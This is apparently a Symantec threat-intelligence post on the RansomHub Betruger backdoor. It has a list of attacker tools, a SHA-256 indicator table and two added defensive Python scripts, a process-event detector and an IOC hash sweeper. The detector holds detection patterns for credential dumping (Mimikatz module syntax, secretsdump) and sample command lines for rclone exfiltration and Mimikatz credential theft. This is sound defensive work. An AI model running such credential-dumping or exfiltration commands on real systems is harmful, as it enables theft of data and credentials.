
RansomHub: Attackers Leverage New Custom Backdoor

Betruger backdoor being used by at least one affiliate of RansomHub.

At least one affiliate of the RansomHub ransomware-as-a-service (RaaS) has begun using a new custom backdoor in attacks. The malware (Backdoor.Betruger) is a rare example of a multi-function backdoor, seemingly developed specifically for use in carrying out ransomware attacks. 

The use of custom malware other than the encrypting payload itself is relatively unusual in ransomware attacks. Most attackers rely on legitimate tools, living-off-the-land techniques, and publicly available tooling such as Mimikatz and Cobalt Strike. Ransomware groups do on occasion develop custom tools, mostly for data exfiltration, such as the Coreid group's Infostealer.Exmatter or the Hecamede group's Infostealer.Exbyte.

Betruger functionality

Analysis of the Betruger backdoor revealed that it combines functionality that attackers usually have to assemble from several separate pre-ransomware tools. This included:

  • Screenshotting
  • Keylogging
  • Uploading files to a command and control (C&C) server
  • Network scanning
  • Privilege escalation
  • Credential dumping 

File names used for versions of this malware included mailer.exe and turbomailer.exe. Despite the names, the backdoor contains no mailing functionality; the attackers most likely chose them so that the file would pass as a legitimate application.

The functionality of Betruger indicates that it may have been developed in order to minimize the number of new tools dropped on a targeted network while a ransomware attack is being prepared. 

Other tools

Betruger is just one of a range of tools that have been used by RansomHub affiliates in recent months. Like a growing number of ransomware attackers, some have begun using tools that leverage the Bring Your Own Vulnerable Driver (BYOVD) technique to disable security solutions, most notably EDRKillShifter.

Attackers also leveraged several vulnerabilities, including a Windows privilege escalation exploit for CVE-2022-24521 (an elevation of privilege flaw in the Common Log File System driver) and an exploit for CVE-2023-27532 in Veeam Backup & Replication, which allows an unauthenticated attacker to retrieve the encrypted credentials stored in its configuration database.

Other tools leveraged in recent attacks include: 

  • Impacket: An open-source collection of modules written in Python for programmatically constructing and manipulating network protocols. Impacket contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.
  • Stowaway Proxy Tool: A publicly available multi-hop proxy tool that allows users to easily proxy their network traffic to intranet nodes.
  • Rclone: An open-source tool that can legitimately be used to manage content in the cloud, but has been seen being abused by ransomware actors to exfiltrate data from victim machines.
  • ScreenConnect: A remote desktop application tool by ConnectWise, used to enable remote access to computers.
  • Mimikatz: Publicly available credential dumping tool.
  • SystemBC: Commodity malware that can open a backdoor on the infected computer and use the SOCKS5 proxy protocol to communicate with a C&C server.
  • NetScan: SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for the discovery of host names and network services.
  • Atera: Legitimate remote monitoring and access software. It and similar tools are often used by attackers to obtain remote access to computers on a network.
  • Splashtop: A family of legitimate remote desktop software and remote support software developed by Splashtop Inc. Enables users to remotely access computers from desktop and mobile devices.
  • TightVNC: Open-source remote desktop software.
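As an added example (not code from the Symantec post), the Python below applies simple detection logic for the tooling named above to a handful of constructed Sysmon-style process-creation events. Field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage); the events themselves, the remote-access binary names, and the rclone remote-name heuristic are assumptions for illustration, not telemetry observed in the attacks described. The renamed Mimikatz event shows why command-line rules matter alongside file names and hashes.

```python
"""Added example (not from the post): behavioural rules over process-creation
events for tools named in the RansomHub write-up. Events are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    command_line: str


# Binary names for the remote-access tools in the post. These are assumed
# defaults (packagers rename them), so treat the set as a starting point.
REMOTE_ACCESS_BINARIES = {
    "screenconnect.clientservice.exe",  # ConnectWise ScreenConnect (assumed)
    "ateraagent.exe",                   # Atera agent (assumed)
    "srserver.exe", "srmanager.exe",    # Splashtop streamer (assumed)
    "tvnserver.exe",                    # TightVNC server (assumed)
}

# File names the post reports Betruger being dropped under.
BETRUGER_MASQUERADE_NAMES = {"mailer.exe", "turbomailer.exe"}

# rclone sub-commands that move data, and a heuristic for a configured remote:
# "<name>:" with a name longer than one character, which excludes Windows drive
# letters such as C:, and not followed by a slash, which excludes URL schemes.
RCLONE_TRANSFER = re.compile(r"\b(copy|sync|move|copyto|moveto)\b", re.I)
RCLONE_REMOTE = re.compile(r"(?<![\w\\])[A-Za-z0-9_-]{2,}:(?![\\/])")

# Mimikatz module syntax survives renaming of the binary.
MIMIKATZ_MODULES = re.compile(r"(sekurlsa::|lsadump::|privilege::debug)", re.I)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerating / and \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return one Finding per rule that fires on a single event."""
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image in BETRUGER_MASQUERADE_NAMES:
        hits.append("betruger_masquerade_filename")
    if image in {"rclone.exe", "rclone"} and RCLONE_TRANSFER.search(cmd) \
            and RCLONE_REMOTE.search(cmd):
        hits.append("rclone_transfer_to_remote")
    if "netscan" in image:
        hits.append("softperfect_netscan")
    if image == "mimikatz.exe" or MIMIKATZ_MODULES.search(cmd):
        hits.append("mimikatz_usage")
    if "secretsdump" in image or "secretsdump" in cmd.lower():
        hits.append("impacket_secretsdump")
    if image in REMOTE_ACCESS_BINARIES:
        hits.append("remote_access_tool")
    return [Finding(rule, image, cmd) for rule in hits]


def scan(events: list) -> list:
    """Evaluate every event in order and concatenate the findings."""
    findings = []
    for event in events:
        findings.extend(evaluate(event))
    return findings


# Constructed events (not real telemetry): a Betruger-style file name, an
# rclone push to a cloud remote, benign activity, a renamed Mimikatz, NetScan.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\turbomailer.exe", "CommandLine": "turbomailer.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\ProgramData\rclone.exe",
     "CommandLine": r'rclone.exe copy "\\FS01\Finance" mega:exfil --transfers 32',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": r"notepad.exe C:\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Temp\m.exe",
     "CommandLine": 'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Temp\netscan.exe", "CommandLine": "netscan.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:32} {f.image:20} {f.command_line}")
```

The rclone rule deliberately requires both a transfer sub-command and a remote target, so a local `rclone copy C:\data D:\backup` does not fire; tune the remote heuristic to the remote names actually configured in your environment.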

Up-and-coming threat

The Betruger backdoor was deployed in several recent RansomHub attacks, suggesting that it is available to at least one affiliate. RansomHub is a RaaS operation run by a cybercrime group Symantec calls Greenbottle. Active since February 2024, Greenbottle quickly grew RansomHub into the most prolific ransomware operation by the third quarter of 2024, responsible for the highest number of claimed attacks. The group has reportedly won over many affiliates by offering better terms than rival operations, such as a greater percentage of ransom payments and a payment model in which the affiliate is paid directly by the victim before passing on the operator's cut.

Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.

Indicators of Compromise

If an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.

IOC (SHA-256) Description
ae7c31d4547dd293ba3fd3982b715c65d731ee07a9c1cc402234d8705c01dfca Betruger
b058c128c801e2ee03874e183239ff369c599f3a2324905ff73f99d16d3b1a16 Betruger
9e0a89c1b98f448865a73049a2b90bdfcd1b9846c4506441cfa6f0e429c1b329 RansomHub
0ad9ab7aa9ecbc79bca0bfce5be58e0aa2606bdab3898daac43a6fa1231af164 RansomHub
290b3fe64fd0875b2dc6bc0ad77dd52a70ad91a81dc24220523d38bf6c538afa RansomHub
35e853cc67bf1869127ed341ea7b1a5cbf7032523288d514dc4685924f898db2 RansomHub
9e0274c4e57381e97ccceadba37b64da35cfc379f80abc53e40f310a5e6b690b RansomHub
a46c3639ba099953def013430063ea018f616c10e4b1cb4fe9a26d261f9dab0d RansomHub
bd82216f1341159e950e9e7a68015c54c4995c8fd7c12c28a839c5068b0919ad RansomHub
df4c29cce2cf1a158ed0cefc860dc54f6fbb9bdafdc3bf5af60b506f78e69e4f RansomHub
6d215534002fe7627763f5dd971d529d2f2186431244108d1fd8b5e9e2c9a3b2 RansomHub
2d4fa520c03b358223d8210f2e9bad572e4914efd6e70cb7db85a377e891e69a RansomHub
24be73b64509dbad476b2873edf500554fed5885826b21e2f538993900d9a364 RansomHub
84099559a6d1dd1fec8a5c065da9f0747fab8ebb7368c197224fa33035eabe8d RansomHub
3c9f0907304f7af7a7b88f931b6733698e86492d02e98e440e87e3ffe2153dbc RansomHub
c4d51f5a4dc95b0ac4b4f44a74d282d84898ddf56293a7dfddd5cb5eb90ec989 RansomHub
262a4dff66ceb25d35d5ca8d8d148c1fee88ea2ee1187877a5a0c8d6a0dd24b5 RansomHub
de4d1f58fa8fa9eb156a37a8d9a3396d58e804f92e5eee25878a36a116f66362 RansomHub
ab84aeee213b902fde9740c466cd53af4bae6d5ea81a2b84c4d534b08b2fa049 RansomHub
1f1d3587e458dd883f9ca282fbf559115334a993ba111ec2296e94de8a6fab83 EDRKillShifter
6af2283337104fac154c26c7c55f274f4c36a231497af96f414897dfbeb6691c SystemBC
76964c6e8283101383a5a99f7a0bd8a7c170e44752a73ce034558c43a19207af Rclone batch file
a8806944ff6cad0d45d956972c32e93f44da7e251352d63c1f058df8384b78d1 Rclone batch file
aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9 Rclone
8dc79c12fe1e8aefb870049c16fd1d62051207310702b99428cd73987e299ca3 CVE-2022-24521 exploit
05633246aeee0959414cf3b4d5482df728cb798b838963270cf416783ef0db7b CVE-2023-27532 exploit
cf87a44c575d391df668123b05c207eef04b91e54300d1cbbec2f48f5209d4a4 CVE-2023-27532 exploit
57f58fd5c140fd86fda11c8f7aae1b53479e1510fbcabe7bee795dc01929285c CVE-2023-27532 exploit
a96a0ba7998a6956c8073b6eff9306398cc03fb9866e4cabf0810a69bb2a43b2 Atera
9fa315259cc627b17a0d99864cd1bf54667bd26ccef5ce50ba412fa8911b10e5 Atera
d37a023b809ef9ec024be3976344813a4b860aa9104e298d5d5d4805381ff3a5 NetScan
e14ba0fb92e16bb7db3b1efac4b13aee178542c6994543e7535d8efaa589870c NetScan
7c0f223f585b9c9b64d4ac8c04724edbffa43b95fa997912960c9c5332ede18b Mimikatz
d04bd76a2710fc35b3a445b5db241f13f199763e38b8fbe5316063c36a27a931 Mimikatz
41abfef1ac0b9700700a9b42cb39cdd79b39a1a5b0eb3d3929e82c650b84bac6 Mimikatz
c3405d9c9d593d75d773c0615254e69d0362954384058ee970a3ec0944519c37 Secretsdump
80a2ae9d5189c55aeb838b651a712e70045d8e45bd95678c61109e6183fe3607 ScreenConnect
edc9222aece9098ad636af351dd896ffee3360e487fda658062a9722edf02185 Stowaway Proxy Tool
f402d9eb5158adac54ab9f4f564051a39a8d817dd66bd46bbb373e80f08a4a08 Splashtop
5f08f5d3732bc019c80277ab6d8d4a4bd49709958e7a1ee8879ddcea21751cbb CVE-2023-27532 exploit
32d8971ce5d541b1eb8863ea66dfd1aee0cb9fdaeb47990991ed301912bffa78 Unknown VBS file
67d99f3afaa21d470f354dade1fa19320cc36d51e7023be64d4daa25af6f5def Unknown file
6ff9eac3b4272e81a3b89f709fba4dba6544db22e72dcb114ba27e10970420ad Unknown file
f9c5d479ead9d36af0dc3389774fa2af85d490d93ff91620b1f9390783247cae Unknown file
3d7658c7db34650db12f11c0f2621c08a80aa0ffb5443a944519b4da0236e446 Unknown file
03fec698a64c49f2650b064f0ba61266b22cae4a8eb8e07959bfc07c9180b905 Unknown file
91c8b02b1fa9d1d555b56e50b091d4c5493b907e18b794f3280682d8d30b96f3 Unknown file
494123779a6edf73807f549b6cd1bffd3bfd660dacb027af66600eaad66f8fb1 Unknown file
7985fbd052906a1cd963d42987ac5c840ddbf920b6c9b274aa5f428021830902 Unknown file
7d7d6c292c05920d8272960c62acb8ab5c000f4c6cf3ed9f5e1edd70f7f33c91 Unknown file
479c27daa3b3bc10de1cde10c54d62f71eed0cb922d32b58fa4083204fecc050 Unknown file
90b9a10809bae2db28b585f9a4fc5f40f474b76db7aa936d2059a1244f955908 Unknown file
aaf985a5817a693f92a2775ce65ef57ddd2425b38533ec95062940d475c5568d Unknown file
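As an added example (not part of the original post), the Python below parses the hash table above from a text file and sweeps a directory tree for files whose SHA-256 matches. It expects the layout printed above (hash, whitespace, description) and skips header and blank lines. The three-line excerpt embedded in it is copied from the table; the file written by the demonstration function is constructed and is not a real sample. Because matching is content-based, a Betruger binary renamed from mailer.exe still matches, while a recompiled or padded build does not, which is why behavioural detection is needed alongside hashes.

```python
"""Added example (not from the post): IOC hash sweep for the table above."""
import hashlib
import os
import re
import sys
import tempfile

# A hash line is 64 hex digits, whitespace, then a free-text description.
IOC_LINE = re.compile(r"^\s*([0-9a-fA-F]{64})\s+(.+?)\s*$")


def parse_iocs(text: str) -> dict:
    """Return {sha256_lowercase: description}; non-hash lines are ignored."""
    iocs = {}
    for line in text.splitlines():
        m = IOC_LINE.match(line)
        if m:
            iocs[m.group(1).lower()] = m.group(2)
    return iocs


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root: str, iocs: dict) -> list:
    """Walk root and return [(path, sha256, description)] for every IOC hit.
    Files that cannot be read (locked, permissions) are skipped, not fatal."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:
                continue
            if digest in iocs:
                hits.append((path, digest, iocs[digest]))
    return hits


# Excerpt of the table above, used when no IOC file is supplied.
SAMPLE_IOC_TEXT = """IOC (SHA-256) Description
ae7c31d4547dd293ba3fd3982b715c65d731ee07a9c1cc402234d8705c01dfca Betruger
1f1d3587e458dd883f9ca282fbf559115334a993ba111ec2296e94de8a6fab83 EDRKillShifter
aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9 Rclone
"""


def sweep_constructed_sample() -> list:
    """Demonstration: write a constructed file into a temporary directory, add
    its hash to the parsed IOC set as if it were listed, and confirm the sweep
    reports it. Returns [(file name, description)]."""
    iocs = parse_iocs(SAMPLE_IOC_TEXT)
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "mailer.exe")  # the name is not what matches
        with open(path, "wb") as f:
            f.write(b"constructed sample, not a real Betruger binary")
        iocs[sha256_file(path)] = "Constructed test sample"
        return [(os.path.basename(p), desc) for p, _digest, desc in sweep(d, iocs)]


if __name__ == "__main__":
    # usage: python ioc_sweep.py <directory> [ioc_table.txt]
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    if len(sys.argv) > 2:
        with open(sys.argv[2], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_IOC_TEXT
    for path, digest, desc in sweep(root, parse_iocs(text)):
        print(f"{desc}\t{digest}\t{path}")
```

Save the full table above to a text file and pass it as the second argument; the parser tolerates the header line and any blank lines, and hashes are compared case-insensitively.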

About the Author

Threat Hunter Team

Symantec

The Threat Hunter Team is a group of security experts within Symantec whose mission is to investigate targeted attacks, drive enhanced protection in Symantec products, and offer analysis that helps customers respond to attacks.
